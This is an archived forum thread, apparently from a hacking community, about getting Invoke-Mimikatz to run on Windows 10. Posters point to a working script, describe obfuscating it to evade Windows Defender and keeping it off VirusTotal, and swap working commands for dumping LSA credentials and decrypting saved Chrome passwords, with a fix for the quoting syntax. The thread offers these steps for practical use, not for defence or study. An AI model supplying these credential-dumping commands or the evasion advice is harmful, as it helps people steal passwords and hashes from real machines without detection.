Jump to content

For those who like Invoke-Mimikatz (Works with Win10)


PoSHMagiC0de

Recommended Posts

On 9/4/2020 at 5:49 PM, kuyaya said:

Hey all

For anyone still searching for a solution, I found one!

I've been searching for a working solution just to dump the logon hashes with powershell. Haven't found a working one, but instead found a working invoke-mimikatz! The one from PowerSploit and Empire doesn't work, but the one from nishang does. Link: https://github.com/samratashok/nishang/blob/master/Gather/Invoke-Mimikatz.ps1

Time to obfuscate it...

Update (09.09, 23:41 CEST): Successfully obfuscated! I tested it on the latest win10 (version 1903 build 18362.1016). AV was Windows Defender, so it also shouldn't get detected by other AV's. I'm obviously not gonna upload it to virustotal, I don't want that script to be detectable 1 week later...

GL to all who also try it, it's totally possible.

OMG, THANK YOU

After hours of searching for a solution, that one worked! You rock 👍

Link to comment
Share on other sites

On 12/29/2020 at 7:13 PM, eeeeeesy said:

I also tried nishangs mimikatz with the command

Invoke-Mimikatz -Command dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect

 

But I get this error about /unprotect so its not decrypting the login data from chrome.

Invoke-Mimikatz : A positional parameter cannot be found that accepts argument '/unprotect'.
At C:\Users\user4\Desktop\newest working mimikats by nishang\Invoke-Mimikatz.ps1:2754 char:1
+ Invoke-Mimikatz -Command dpapi::chrome /in:"%localappdata%\Google\Chr ...

 

Could you tell me what I'm doing wrong?

Yes, you're using the commands wrong.

If you want to execute an Invoke-Mimikatz command with spaces, you have to enclose it like that:

Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

However, this doesn't work for commands which require quotes in the command, like the dpapi::chrome does. I'll search for something which works.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...